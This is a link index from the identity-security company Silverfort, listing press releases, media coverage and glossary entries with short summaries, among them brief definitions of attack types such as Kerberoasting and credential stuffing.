- [The Trust Stack For Enterprise AI: Building Trust And Easing Adoption](https://www.forbes.com/sites/alexanderpuutio/2025/01/22/the-trust-stack-for-enterprise-ai-building-trust-and-easing-adoption/) - [Ridding your network of NTLM](https://www.csoonline.com/article/2097636/ridding-your-network-of-ntlm.html#new_tab) - [Researchers Find Exploit Allowing NTLMv1 Despite Active Directory Restrictions](https://thehackernews.com/2025/01/researchers-find-exploit-allowing.html#new_tab) - [Year in Review: Cybersecurity Reports That Shaped 2024 and Thinking About 2025](https://softwareanalyst.substack.com/p/year-in-review-cybersecurity-reports?utm_source=substack&utm_medium=email&utm_content=share#new_tab) - [How to Address an Overlooked Aspect of Identity Security: Non-human Identities](https://www.securityinfowatch.com/cybersecurity/article/55252694/how-to-address-an-overlooked-aspect-of-identity-security-non-human-identities#new_tab) - [How to Protect Your Environment From the NTLM Vulnerability](https://www.darkreading.com/endpoint-security/how-to-protect-your-environment-from-the-ntlm-vulnerability#new_tab) - [Silverfort Unveils Privileged Access Security: An Offering that Finally Solves the Critical Gaps of Traditional PAM Solutions](https://www.silverfort.com/press-news/silverfort-unveils-privileged-access-security/): The newest product is the first to provide seamless discovery, classification, and enforcement of security controls for all privileged accounts,... - [Silverfort Acquires Rezonate, Expanding its Cloud Identity Security Offering to Deliver the First Complete Identity Security Platform](https://www.silverfort.com/press-news/silverfort-acquires-rezonate-to-deliver-the-first-complete-identity-security-platform/): With Rezonate’s acquisition, Silverfort continues to break down identity security silos across all enterprise environments, on-prem and in the cloud,... 
- [Silverfort's Identity-First Incident Response Solution Dramatically Cuts Investigation & Recovery Times From Weeks Down to Days](https://www.silverfort.com/press-news/silverforts-identity-first-incident-response-solution-dramatically-cuts-investigation-recovery-times-from-weeks-down-to-days/): The new offering already assisted several Fortune 500 companies in recent breaches; complements existing incident response (IR) tools to help...
- [Silverfort Expands Operations to India and South Asia, Bringing a Universal Approach to Identity Security to the Region](https://www.silverfort.com/press-news/silverfort-expands-operations-to-india-and-south-asia-bringing-a-universal-approach-to-identity-security-to-the-region/): An expansive partner network across the SAARC market ensures every business across the region will have access to a universal...
- [Silverfort Launches the Identity Security Alliance, Enabling Advanced Integrations to Bring Identity Threat Intelligence and Security Across Both On-Prem and Cloud Identity Infrastructure](https://www.silverfort.com/press-news/silverfort-launches-the-identity-security-alliance/): Dozens of companies, Microsoft, Okta, Ping Identity, Splunk, Wiz and others, partner to help customers overcome the challenges of securing...
- [Silverfort Unveils Global Partner Program to Meet Growing Demand for Unified Identity Protection](https://www.silverfort.com/press-news/silverfort-unveils-global-partner-program-to-meet-growing-demand-for-unified-identity-protection/): Channel industry veteran Leslie Bois leads the company toward its 100% channel-focused business strategy Tel Aviv, Israel & Boston –...
- [Silverfort Research Finds Two-Thirds of Businesses Sync On-prem Passwords to Cloud Environments, Opening their Cloud to Cyberattack](https://www.silverfort.com/press-news/silverfort-research-finds-two-thirds-of-businesses-sync-on-prem-passwords-to-cloud-environments/): Company Unveils its Proprietary Identity Underground Report 2024; First Identity Report 100% Dedicated to Exposing Frequency & Prevalence of Identity...
- [Silverfort Raises $116M to Deliver a Unified Layer of Identity Security Across All Enterprise Resources, Including Previously ‘Unprotectable’ Ones](https://www.silverfort.com/press-news/silverfort-raises-116m-to-deliver-a-unified-layer-of-identity-security-across-all-enterprise-resources/): Following 100%+ year-over-year revenue growth, with 100+ customers added quarterly, including multiple Fortune 50 companies, Silverfort announces Series D funding,...
- [Silverfort, First to Deliver Automated Identity Protection of Thousands of Service Accounts With a Single Click—Securing Machine-to-Machine Communications](https://www.silverfort.com/press-news/silverfort-first-to-deliver-automated-identity-protection-of-thousands-of-service-accounts-with-a-single-click-securing-machine-to-machine-communications/): Customers can now discover, monitor, and protect their service accounts with fully automated visibility, risk analysis, and adaptive access policies...
- [The Hacker News: Product Walkthrough: Silverfort's Unified Identity Protection Platform](https://www.silverfort.com/press-news/the-hacker-news-product-walkthrough-silverforts-unified-identity-protection-platform/)
- [Safety Detectives: Interview With Gal Sadeh - Head of Data and Security Research at Silverfort](https://www.safetydetectives.com/blog/gal-sadeh-silverfort/#new_tab)
- [Forbes: Rethinking The Framework Around Identity Security](https://www.silverfort.com/press-news/forbes-rethinking-the-framework-around-identity-security/)
- [CSO: As perimeter defenses fall, the identify-first approach steps into the breach](https://www.silverfort.com/press-news/cso-as-perimeter-defenses-fall-the-identify-first-approach-steps-into-the-breach/)
- [Silicon Republic – Why identity infrastructure is the new cyberattack surface](https://www.silverfort.com/press-news/silicon-republic-why-identity-infrastructure-is-the-new-cyberattack-surface/)
- [SecurityWeek – Silverfort Open Sources Lateral Movement Detection Tool](https://www.silverfort.com/press-news/securityweek-silverfort-open-sources-lateral-movement-detection-tool/)
- [IT Brew – Organizations woefully underprepared for identity surface threats, survey finds](https://www.silverfort.com/press-news/it-brew-organizations-woefully-underprepared-for-identity-surface-threats-survey-finds/)
- [Security Boulevard – Open Sourcing Our Lateral Movement Detection Tool: LATMA](https://www.silverfort.com/press-news/security-boulevard-open-sourcing-our-lateral-movement-detection-tool-latma/)
- [Help Net Security – Is your identity safe? Exploring the gaps in threat protection](https://www.silverfort.com/press-news/help-net-security-is-your-identity-safe-exploring-the-gaps-in-threat-protection/)
- [Security Boulevard – How Silverfort Can Enable Utility Companies Take Advantage of FERC Incentives](https://www.silverfort.com/press-news/security-boulevard-how-silverfort-can-enable-utility-companies-take-advantage-of-ferc-incentives/)
- [CIO Influence – Silverfort and Osterman Research Report Exposes Critical Gaps in Identity Threat Protection](https://www.silverfort.com/press-news/cio-influence-silverfort-and-osterman-research-report-exposes-critical-gaps-in-identity-threat-protection/)
- [Security Boulevard – MGM Breach Takeaway: On-Prem Has Become Attackers’ Gateway to the Cloud](https://www.silverfort.com/press-news/security-boulevard-mgm-breach-takeaway-on-prem-has-become-attackers-gateway-to-the-cloud/)
- [CyberWire Pro – Casinos returning to normal, post-ransomware](https://www.silverfort.com/press-news/cyberwire-pro-casinos-returning-to-normal-post-ransomware/)
- [The Hacker News – Think Your MFA and PAM Solutions Protect You? Think Again](https://www.silverfort.com/press-news/the-hacker-news-think-your-mfa-and-pam-solutions-protect-you-think-again/)
- [Help Net Security – Companies need to rethink how they implement identity security](https://www.silverfort.com/press-news/help-net-security-companies-need-to-rethink-how-they-implement-identity-security/)
- [Security Boulevard – Identity Protection Can't Be Taken For Granted Anymore](https://www.silverfort.com/press-news/security-boulevard-identity-protection-cant-be-taken-for-granted-anymore/)
- [Israel Defense – Silverfort Research: 83% of organizations Experienced Identity-Related Breach](https://www.silverfort.com/press-news/israel-defense-silverfort-research-83-of-organizations-experienced-identity-related-breach/)
- [CyberWire News Briefing – Identity protection trends.](https://www.silverfort.com/press-news/cyberwire-news-briefing-what-was-in-the-crash-dump-vulnerability-affects-booking-service-adversary-emulation-for-ot-networks-identity-protection-trends-estonia-warns-of-ongoing-cybe/)
- [IT Online – Critical gaps in identity threat protection exposed](https://www.silverfort.com/press-news/it-online-critical-gaps-in-identity-threat-protection-exposed/)
- [Silverfort and Osterman Research Report Exposes Critical Gaps in Identity Threat Protection](https://www.silverfort.com/press-news/silverfort-and-osterman-research-report-exposes-critical-gaps-in-identity-threat-protection/): Inaugural State of Identity Security report finds that 83% of organizations experienced an identity-related breach Boston & Tel Aviv, Sept. 6,...
- [Security Magazine – 94% of organizations don't have full visibility into service accounts](https://www.silverfort.com/press-news/security-magazine-94-of-organizations-dont-have-full-visibility-into-service-accounts/)
- [TDWI – Report Exposes Critical Gaps in Identity Threat Protection](https://www.silverfort.com/press-news/tdwi-report-exposes-critical-gaps-in-identity-threat-protection/)
- [VMBlog – Silverfort and Osterman Research Report Exposes Critical Gaps in Identity Threat Protection](https://vmblog.com/archive/2023/09/06/silverfort-and-osterman-research-report-exposes-critical-gaps-in-identity-threat-protection.aspx)
- [Security Boulevard – Time to Wake Up: The Defenses of the Identity Attack Surface are Broken](https://www.silverfort.com/press-news/security-boulevard-time-to-wake-up-the-defenses-of-the-identity-attack-surface-are-broken/)
- [Silverfort Recognized as a Microsoft Security Excellence Awards Finalist for Zero Trust Champion and Security ISV of the Year](https://www.silverfort.com/press-news/silverfort-recognized-microsoft-security-excellence-awards-finalist-zero-trust-champion-security-isv/): Boston & Tel Aviv, March 20, 2023 — Silverfort, the leader in Unified Identity Protection, today announced it is a...
- [CBS17: Scammers are using the SVB collapse to steal identities](https://www.silverfort.com/press-news/cbs17-scammers-are-using-the-svb-collapse-to-steal-identities/): Our Co-Founder and CTO, Yaron Kassner, talks to CBS17 about how businesses can protect themselves from attacks taking advantage of...
- [Silverfort introduces five senior appointments](https://www.silverfort.com/press-news/silverfort-introduces-five-senior-appointments/): Unified Identity Protection leader continues its fast growth, with 50% of all executive team positions now held by women. Boston...
- [John Paul Cunningham joins Silverfort as CISO](https://www.silverfort.com/press-news/john-paul-cunningham-joins-silverfort-as-ciso/): Career CISO with experience working for organizations such as Bank of Hope and J.P. Morgan Asset Management joins Unified...
- [Silverfort launches free identity risk assessment enabling companies to stay ahead of expanding cyber insurance requirements](https://www.silverfort.com/press-news/silverfort-launches-free-identity-risk-assessment/): Thursday 2 February 2023, Boston and Tel Aviv: Unified Identity Protection leader, Silverfort, today launched the most comprehensive free cyber...
- [Howden Group simplifies cybersecurity insurance compliance with Silverfort’s Unified Identity Protection](https://www.silverfort.com/press-news/howden-group-simplifies-cybersecurity-insurance-compliance-with-silverfort/): Partnership enables international broker to offer customers in 45 countries effortless deployment of MFA on previously ‘unprotectable’ resources and automated...
- [Security Boulevard: Flaw in Aged Boa Web Server Threatens Supply Chain](https://www.silverfort.com/press-news/security-boulevard-flaw-in-aged-boa-web-server-threatens-supply-chain/): Microsoft may have retired the Boa web server in 2005, but that hasn’t stopped widespread use—and now the company is...
- [CPO Magazine: A Decade of Discussion and We’re Still Not Thinking Laterally](https://www.silverfort.com/press-news/cpo-magazine-a-decade-of-discussion-and-were-still-not-thinking-laterally/): Lateral movement has been a common factor in breaches for some time. As the effectiveness of perimeter defences has been...
- [ComputerWeekly: LastPass probes new cyber incident related to August attack](https://www.silverfort.com/press-news/computerweekly-lastpass-probes-new-cyber-incident-related-to-august-attack/): The August 2022 cyber attack on LastPass seems to have begat another incident, according to company CEO Karim Toubba Credential...
- [Forbes: New LastPass Hack Confirmed—Here’s What We Know So Far](https://www.silverfort.com/press-news/forbes-new-lastpass-hack-confirmed-heres-what-we-know-so-far/): On Wednesday, 30 November, LastPass CEO, Karim Toubba, confirmed that an unauthorized party had gained access to “certain elements of...
- [Security Magazine: Iranian APT breaches government agency using Log4Shell](https://www.silverfort.com/press-news/security-magazine-iranian-apt-breaches-government-agency-using-log4shell/): Iranian government-sponsored advanced persistent threat (APT) actors breached the Federal Civilian Executive Branch (FCEB) and its network, according to a...
- [Silverfort to Provide Acrisure Cyber Services Clients with Compliant Identity Protection](https://www.silverfort.com/press-news/acrisure-silverfort-partnership-announcement/): New partnership to help policyholders easily meet growing identity protection requirements Thursday 3 November 2022, Boston, MA: Silverfort, a unified...
- [Spiceworks: How can organizations prevent lateral movement attacks by harnessing risk analysis and MFA?](https://www.silverfort.com/press-news/spiceworks-how-can-organizations-prevent-lateral-movement-attacks-by-harnessing-risk-analysis-and-mfa/): In a world that has grown accustomed to the inevitability of initial compromise, lateral movement is becoming the new battleground....
- [Washington Examiner: Finger-pointing over Uber hack](https://www.silverfort.com/press-news/press-washington-examiner-silverfort-comments-on-uber-hack/): On Sept. 19, the Uber hack was blamed on hacking group Lapsus$, which the company announced days earlier. Lapsus$ is an...
- [Help Net Security: Tim Fleming joins Silverfort as Strategic Advisor](https://www.silverfort.com/press-news/press-help-net-security-tim-fleming-appointed-as-strategic-advisor/): Unified Identity Protection company Silverfort has appointed Tim Fleming as Strategic Advisor. Responsible for all commercial and operational technology strategy at Deloitte for over...
- [Ex-Deloitte CIO joins Silverfort as Strategic Advisor](https://www.silverfort.com/press-news/ex-deloitte-cio-joins-silverfort-as-strategic-advisor/): Tim Fleming brings over 40 years’ risk management and innovation experience at large organizations to fast-scaling Unified Identity Security platform...
- [Technology Magazine: How can organisations ensure cyber resilience?](https://www.silverfort.com/press-news/technology-mag-how-can-organisations-ensure-cyber-resilience/): Yaron Kassner, Co-Founder and CTO of Silverfort, spoke to Technology magazine about how businesses can develop cyber resilience. Keeping up...
- [Security Magazine: Hashed passwords exposed in Slack vulnerability](https://www.silverfort.com/press-news/security-mag-hashed-passwords-exposed-in-slack-vulnerability/): Office communication platform Slack has admitted to accidentally exposing the hashed passwords of some users. According to Wired, the vulnerability...
- [Silverfort Named #21 in Calcalist's List of the 50 Most Promising Israeli Startups](https://www.silverfort.com/press-news/silverfort-21-calcalist-list-50-most-promising-israeli-startups/): The field of identity verification in the cyber world is full of competition on the one hand, and saturated with...
- [Silverfort Raises $65M Series C for World’s First Unified Identity Threat Protection Platform](https://www.silverfort.com/press-news/silverfort-raises-65m-series-c-worlds-first-unified-identity-threat-protection-platform/): Led by Greenfield Partners and strategic investors such as General Motors, the new funding will further accelerate the company’s growth...
- [Silverfort Appoints Drew Schuil as Chief Revenue Officer](https://www.silverfort.com/press-news/silverfort-appoints-drew-schuil-as-chief-revenue-officer/): BOSTON & TEL AVIV, Israel–(BUSINESS WIRE)–Silverfort, the unified identity protection company, today announced the appointment of Drew Schuil as Chief...
- [Silverfort Partners with IDSA to Build Awareness for Identity-Based Zero Trust](https://www.silverfort.com/press-news/silverfort-partners-with-idsa-to-build-awareness-for-identity-based-zero-trust/): Company will Work with the Identity Defined Security Alliance to Help Organizations Overcome Modern Authentication and Access Management Challenges BOSTON...
- [Silverfort Introduces Industry First Prevention Against Pass the Ticket Attacks](https://www.silverfort.com/press-news/silverfort-introduces-industry-first-prevention-against-pass-the-ticket-attacks/): Until Now, Forged Kerberos Sessions Could Only be Detected Retroactively Boston and Tel Aviv, July 8, 2021 – Silverfort, the...
- [Silverfort and Ping Identity Partner to Unify Risk Based Authentication Across Cloud and Hybrid Environments](https://www.silverfort.com/press-news/silverfort-ping-identity-unify-rba-across-cloud-hybrid-environment/): Product Integration Provides Comprehensive Visibility and Assessment of Access Activity that Enables Customers to Identify and Respond to Threats Boston...
- [Silverfort Recognized as a Microsoft Security 20/20 Partner Awards Finalist for Identity Trailblazer Category](https://www.silverfort.com/press-news/silverfort-microsoft-security-20-20-partner-awards-finalist-identity-trailblazer/): Company’s Unified Identity Protection Platform Consolidates Security Controls for On-Premises and Cloud Environments to Block Attacks Boston and Tel Aviv,...
- [Silverfort Launches Unified Identity Protection Platform for Microsoft Azure Active Directory](https://www.silverfort.com/press-news/unified-identity-protection-for-azure-ad/): Platform Enables Organizations to Centralize Identity and Access Management (IAM) for Cloud and Legacy On-premises Resources on Azure Active Directory,...
- [The Future of Work, Security and Women in Tech](https://www.silverfort.com/press-news/the-future-of-work-security-and-women-in-tech-2/): Aleta Jeffress (Status Go Episode 3) returns to discuss what’s changed... and what hasn’t changed in the last two years....
- [Silverfort Secures $30 Million in Series B Funding](https://www.silverfort.com/press-news/silverfort-secures-30-million-in-series-b-funding/): Boston, Tel Aviv August 4th, 2020 – Silverfort, provider of the industry’s first agentless, proxyless authentication platform, announced today that...
- [[Hebrew] Silverfort breakthrough in MFA](https://www.silverfort.com/press-news/silverfort-breakthrough-in-mfa-hebrew/): In today’s new world, where nearly everyone is working remotely, passwords just aren’t enough to keep your company’s sensitive assets...
- [The Silverfort Story: The Next Chapter](https://www.silverfort.com/press-news/the-silverfort-story-the-next-chapter/): During RSA Conference, we had a chance to connect with Dana Tamir from Silverfort to get the updated Silverfort story....
- [Addressing IAM Pain Points and Security Gaps](https://www.silverfort.com/press-news/addressing-iam-pain-points-and-security-gaps/): Hed Kovetz of Silverfort Reviews Holistic Agentless Approach to Secure Authentication
- [Silverfort Named Winner of the Coveted InfoSec Award ‘Most Promising Cybersecurity Startup of the Year’ during RSA Conference 2020](https://www.silverfort.com/press-news/silverfort-named-winner-of-the-coveted-infosec-award-most-promising-cybersecurity-startup-of-the-year-during-rsa-conference-2020/): Silverfort’s Agentless Authentication Platform wins ‘Most Innovative Identity and Access Management’ In 8th Annual InfoSec Awards at #RSAC 2020 SAN...
- [Silverfort Recognized as a Microsoft Security 20/20 Partner Awards Finalist for Emerging ISV Disruptor](https://www.silverfort.com/press-news/silverfort-recognized-as-a-microsoft-security-20-20-partner-awards-finalist-for-emerging-isv-disruptor/): BOSTON, MA and Tel Aviv, Israel Dec. 17, 2019 — Silverfort today announced it has been named a finalist in...
- [Silverfort Joins the Microsoft Intelligent Security Association](https://www.silverfort.com/press-news/silverfort-joins-the-microsoft-intelligent-security-association/): After Announcing a Co-Sell Partnership, the Companies Strengthen Their Relationship to Drive Secure Authentication in the Perimeter-less Cloud Era. October...
- [Silverfort Recognized by 451 Research as a ‘451 Firestarter’](https://www.silverfort.com/press-news/silverfort-recognized-by-451-research-as-a-451-firestarter/): Provider of agentless, proxyless authentication platform recognized by leading analyst firm for innovation and vision in the technology industry BOSTON,...
- [Silverfort Joins RSA® Ready Technology Partner Program](https://www.silverfort.com/press-news/silverfort-joins-rsa-ready-technology-partner-program/): Silverfort’s Agentless Authentication Platform enables joint customers to seamlessly extend RSA SecurID® Access to any sensitive system and apply Zero-Trust...
- [Silverfort Named a Gartner Cool Vendor in Identity and Access Management for 2019](https://www.silverfort.com/press-news/silverfort-named-a-may-2019-gartner-cool-vendor-in-identity-and-access-management/): Vendors Included in 2019 Cool Vendor Report are Interesting, New and Innovative...
- [Most Promising Israeli Cybersecurity Startups for 2019](https://www.silverfort.com/press-news/most-promising-israeli-cybersecurity-startups-for-2019/): Most Promising Israeli Cybersecurity Startups for 2019
- [Silverfort and Okta Partner to Enable Secure Authentication for ‘Unprotectable’ Systems](https://www.silverfort.com/press-news/silverfort-and-okta-partner-to-enable-secure-authentication-for-unprotectable-systems/): The new partnership will allow joint customers to seamlessly extend Okta Adaptive...
- [Silverfort Named Winner of Most Innovative Adaptive Authentication InfoSec Award for 2019 by Cyber Defense Magazine](https://www.silverfort.com/press-news/silverfort-named-winner-of-most-innovative-adaptive-authentication-infosec-award-for-2019-by-cyber-defense-magazine/): Silverfort Named Winner of Most Innovative...
- [Silverfort Achieves Microsoft Co-Sell Status](https://www.silverfort.com/press-news/silverfort-achieves-microsoft-co-sell-status/): Co-sell partnership to provide unparalleled access to Microsoft’s Enterprise customers.
- [Industry Veteran Alan Cohen Joins Silverfort As Strategic Advisor](https://www.silverfort.com/press-news/industry-veteran-alan-cohen-joins-silverfort-as-strategic-advisor/): Cohen to advise on the company’s vision and scaling operations to meet growing demand for its agentless...
- [The 9 new rules of IT leadership](https://www.silverfort.com/press-news/9-new-rules-leadership/): Silverfort’s CEO Hed Kovetz discusses the rapid changes in technology solutions and strategies, and explains...
- [Not a breach: Citrix takes preemptive cybercrime strike, forces users to change passwords](https://www.silverfort.com/press-news/not-breach-citrix-takes-preemptive-cybercrime-strike-forces-users-change-passwords/): Dana Tamir, VP Market Strategy at...
- [Multifactor Authentication Will Be Key for Businesses Protecting Cloud Assets](https://www.silverfort.com/press-news/multifactor-authentication-will-key-businesses-protecting-cloud-assets/): Silverfort’s CEO Hed Kovetz explains why mobile push notifications...
- [Security 2019 Predictions - DZone Security](https://www.silverfort.com/press-news/security-2019-predictions/): Silverfort’s CTO Yaron Kassner reveals how security will evolve in the coming year.
- [Zero Trust Security Gains Steam With IT Security Practitioners](https://www.silverfort.com/press-news/zero-trust-security-gains-steam-security-practitioners/): Silverfort’s CEO Hed Kovetz notes that a key aspect of a Zero Trust model is strong...
- [IoT 2019 Predictions - DZone Security](https://www.silverfort.com/press-news/iot-2019-predictions/): Yaron Kassner, CTO at Silverfort, says IoT security will become an important initiative in 2019, read more...
- [Silverfort Launches First Holistic AI-Driven Adaptive Authentication Engine for Securing Corporate Identities without Impacting Usability](https://www.silverfort.com/press-news/silverfort-launches-first-holistic-ai-driven-adaptive-authentication/): The agentless solution analyzes user...
- [Silverfort Partners with Check Point to Deliver Threat-Driven Multi-factor Authentication (MFA)](https://www.silverfort.com/press-news/silverfort-partners-with-check-point-to-deliver-threat-driven-mfa/): The joint solution enables real-time step-up authentication response to detected threats...
- [Silverfort Next-Gen Authentication App Now Available on the Palo Alto Networks Application Framework](https://www.silverfort.com/press-news/silverfort-next-gen-authentication-app-now-available-on-the-palo-alto-networks-application-framework/): Next Generation Authentication Leader Onboards Executives to Scale Operations and Meet...
- [Listen to the podcast ‘Their Story Chats’ with Silverfort Dana Tamir](https://www.silverfort.com/press-news/listen-to-the-podcast/): Listen to the podcast ‘Their Story Chats’ with Silverfort Dana Tamir discussing Multi...
- [Silverfort Expands Executive Leadership Team To Drive Accelerated Growth And Innovation](https://www.silverfort.com/press-news/silverfort-expands-executive-leadership-team-drive-accelerated-growth-innovation/): Next Generation Authentication Leader Onboards Executives to Scale Operations and Meet...
- [Forget About Passwords, Advance to Multi Factor Authentication with Silverfort](https://www.silverfort.com/press-news/forget-passwords-advance-multi-factor-authentication-silverfort/): Silverfort is a Tel-Aviv Startup that protects enterprises from data breaches, cyber attacks...
- [Chuck Harold from Security Guy TV at Blackhat 2018](https://www.silverfort.com/press-news/securityguy-tv-interview-silverfort-vp-market-strategy-danatamir-blackhat-2018/): SecurityGuy TV interviews Silverfort VP Market Strategy Dana Tamir at Black Hat 2018...
- [Black Hat USA 2018 Conference Focuses on Cyber Threats and Unique Solutions](https://www.silverfort.com/press-news/black-hat-usa-2018-conference-focuses-cyber-threats-unique-solutions/): Hed Kovetz, co-founder & CEO of Silverfort, spoke about the recent Reddit security breach. “Implementing multi-factor...
- [Silverfort's Co-Founder and CEO, Hed Kovetz on the Reddit breach](https://www.silverfort.com/press-news/silverforts-co-founder-ceo-hed-kovetz-reddit-breach/): Implementing multi-factor authentication (MFA) on servers and applications is currently a difficult and resource-consuming task...
- [Data Breaches at Timehop, Macy's Highlight Need for Multi-Factor Authentication](https://www.silverfort.com/press-news/data-breaches-timehop-macys-highlight-need-multi-factor-authentication/): Names, email addresses, and some phone numbers belonging to 21 million people exposed.
- [Silverfort Raises $11.5 Million in Series A to Deliver the Next Generation of Multi-Factor Authentication](https://www.silverfort.com/press-news/silverfort-raises-11-5-million-series-enable-multi-factor-authentication-without-integration/): Silverfort’s revolutionary authentication platform delivers adaptive multi-factor authentication...
- [Silverfort Announces New Threat-Driven Multifactor Authentication App for the Palo Alto Networks Application Framework](https://www.silverfort.com/press-news/silverfort-announces-new-partnership-palo-alto-networks/): Silverfort, which enables strong authentication...
- [Silverfort Expands North American Presence with New Offices in Boston and Houston](https://www.silverfort.com/press-news/silverfort-expands-north-american-presence-new-offices-boston-houston/): Expansion enables Silverfort to strengthen its North American operations

---

## Glossary

- [Honeypot Account](https://www.silverfort.com/glossary/honeypot-account/): A decoy user account planted in a system solely to entice attackers and instantly alert the security team when accessed,...
- [Identity Verification](https://www.silverfort.com/glossary/identity-verification/): The process of validating that an individual is who they claim to be, often through document checks, biometrics, knowledge-based methods,...
- [Machine Identity](https://www.silverfort.com/glossary/machine-identity/): The digital credentials (such as certificates, cryptographic keys, and service accounts) assigned to devices, applications, and services, enabling trusted...
- [Identity Security](https://www.silverfort.com/glossary/identity-security/): Identity Security is the discipline of protecting digital identities—human and non-human—from unauthorized access, abuse, and compromise.
- [Credential Access](https://www.silverfort.com/glossary/credential-access/): A stage in the cyberattack lifecycle where adversaries obtain legitimate credentials to impersonate users and bypass security controls.
- [Compromised Credential](https://www.silverfort.com/glossary/compromised-credential/): Login details—such as usernames and passwords—that have been stolen or exposed and can be misused for unauthorized access or lateral...
- [Identity Threat Exposure](https://www.silverfort.com/glossary/identity-threat-exposure/): Security weaknesses—such as misconfigurations, outdated identity systems, or exploitable built-in features—that expose organizations to identity-based threats like credential theft, privilege...
- [Privilege Escalation](https://www.silverfort.com/glossary/privilege-escalation/): A type of attack in which an adversary acquires higher access controls—either by exploiting bugs or misconfigurations—to perform unauthorized operations.
- [Unconstrained Delegation](https://www.silverfort.com/glossary/unconstrained-delegation/): A Kerberos delegation type that allows a service to act on behalf of a user to any other service, posing...
- [Kerberos Delegation](https://www.silverfort.com/glossary/kerberos-delegation/): A Kerberos mechanism that allows services to act on behalf of authenticated users to access other services, with variants—unconstrained, constrained,...
- [Kerberoasting](https://www.silverfort.com/glossary/kerberoasting/): A stealthy AD attack where adversaries request Kerberos Ticket Granting Service (TGS) tickets for service accounts, then crack them offline...
- [Prolific User](https://www.silverfort.com/glossary/prolific-user/): A user who frequently accesses multiple systems or performs numerous actions, often generating high volumes of identity activity that may...
- [MITRE ATT&CK Framework](https://www.silverfort.com/glossary/mitre-attack-framework/): A globally recognized knowledge base of adversarial tactics, techniques, and procedures used to simulate, understand, and defend against cybersecurity threats.
- [Cyber Security Compliance](https://www.silverfort.com/glossary/cyber-security-compliance/): Adherence to laws, regulations, and standards (e.g., HIPAA, GDPR, PCI DSS, SOX) governing how sensitive data must be handled...
- [Adaptive Multi-Factor Authentication](https://www.silverfort.com/glossary/adaptive-multi-factor-authentication/): A risk-based authentication system that evaluates login context using AI and machine learning, prompting for extra factors only when a...
- [Non-Human Identity](https://www.silverfort.com/glossary/non-human-identity/): Digital identities assigned to systems, bots, or services rather than people—like service accounts or automated agents—that require management and protection...
- [Identity Security Posture Management](https://www.silverfort.com/glossary/identity-security-posture-management/): The continuous process of auditing and strengthening IAM environments—such as user access, authentication methods, and entitlements—to remediate vulnerabilities and reduce...
- [Ransomware](https://www.silverfort.com/glossary/ransomware/): Malicious software that encrypts an organization’s data or systems and demands a ransom to release the decryption key, often coupled...
- [Credential Theft](https://www.silverfort.com/glossary/credential-theft/): The act of stealing login credentials through methods like phishing, malware, brute-force attacks, or data breaches, allowing unauthorized access and...
- [Attack Surface Management](https://www.silverfort.com/glossary/attack-surface-management/): The ongoing process of discovering, monitoring, and reducing an organization’s vulnerabilities and exposed assets to shrink its attack surface.
- [Identity Infrastructure](https://www.silverfort.com/glossary/identity-infrastructure/): The collection of systems, authentication mechanisms, and access control policies enabling secure creation, verification, and management of digital identities within...
- [Risk-based Authentication](https://www.silverfort.com/glossary/risk-based-authentication/): A dynamic authentication method that assesses contextual risk factors—such as location, device, and behavior—in real time and adjusts authentication strength...
- [Identity Fabric](https://www.silverfort.com/glossary/identity-fabric/): A unified, interconnected IAM architecture that dismantles siloed identity systems to centrally coordinate provisioning, authentication, and access governance across hybrid...
- [Identity-Based Attack](https://www.silverfort.com/glossary/identity-based-attacks/): Cyberattacks that exploit compromised credentials to misuse legitimate authentication paths, enabling attackers to evade detection and access both on‑premises and...
- [MFA Fatigue](https://www.silverfort.com/glossary/mfa-fatigue/): A vulnerability where users become overwhelmed by constant multi-factor authentication prompts, potentially leading to inadvertent approval of fraudulent access attempts.
- [User Account](https://www.silverfort.com/glossary/user-account/): A digital identity representing a specific person—used to authenticate and control access to systems, applications, and data.
- [Attack Surface](https://www.silverfort.com/glossary/attack-surface/): The comprehensive set of digital and physical vulnerabilities and entry points through which an attacker might gain unauthorized access to... - [User Authentication](https://www.silverfort.com/glossary/user-authentication/): The process of verifying an individual's claimed identity (e.g., via passwords, tokens, or biometrics) before granting access to... - [Identity Threat Detection and Response](https://www.silverfort.com/glossary/identity-threat-detection-and-response/): A security approach that monitors and analyzes identity‑related activities to detect credential theft, privileged misuse, or lateral movement, triggering automated... - [Unified Identity Protection](https://www.silverfort.com/glossary/unified-identity-protection/): A consolidated security approach that provides centralized visibility and automated safeguards across all identity types—human and machine—to detect and respond... - [Principle of Least Privilege](https://www.silverfort.com/glossary/principle-of-least-privilege/): A security principle where users and systems are granted only the minimal access levels necessary to perform their functions, limiting... - [Privileged Account](https://www.silverfort.com/glossary/privileged-account/): An account with elevated permissions (such as administrator or root access) that allows extensive control over systems and data—making it... - [Identity Segmentation](https://www.silverfort.com/glossary/identity-segmentation/): A cybersecurity strategy that isolates users into groups based on roles, attributes, or behavior in order to enforce least‑privilege access... - [Azure AD](https://www.silverfort.com/glossary/azure-ad/): Microsoft’s cloud-based identity and access management service offering single sign-on, multifactor authentication, and integration with on‑premises Active Directory for hybrid... 
- [Zero Trust](https://www.silverfort.com/glossary/zero-trust/): A cybersecurity framework that eliminates any implicit trust within a network by continuously verifying every user and device, enforcing least-privilege... - [Credential Stuffing](https://www.silverfort.com/glossary/credential-stuffing/): A cyberattack technique where automated tools test stolen or leaked credentials across multiple services to gain unauthorized access due to... - [Cyber Insurance](https://www.silverfort.com/glossary/cyber-insurance/): Insurance designed to protect individuals or organizations from financial and operational losses caused by cyber events, such as data breaches... - [Multi-Factor Authentication (MFA)](https://www.silverfort.com/glossary/multi-factor-authentication-mfa/): A security measure requiring two or more distinct forms of identity verification—such as a password plus a token or biometric—for... - [Privileged Access Management (PAM)](https://www.silverfort.com/glossary/privileged-access-management-pam/): Technologies and policies that manage and monitor elevated-level user access (e.g., administrators), enforcing strict controls and reducing security... - [Air-Gapped Network](https://www.silverfort.com/glossary/an-air-gapped-network/): A highly secure, physically isolated network with no external connectivity, used to safeguard highly sensitive systems in sectors like defense... - [Adaptive Authentication](https://www.silverfort.com/glossary/adaptive-authentication/): A dynamic security method that uses contextual signals like device, location, and user behavior to determine whether additional authentication is... - [Active Directory](https://www.silverfort.com/glossary/active-directory/): Active Directory (AD) is Microsoft’s centralized directory service that organizes and manages user accounts, computers, groups, and other network resources,... 
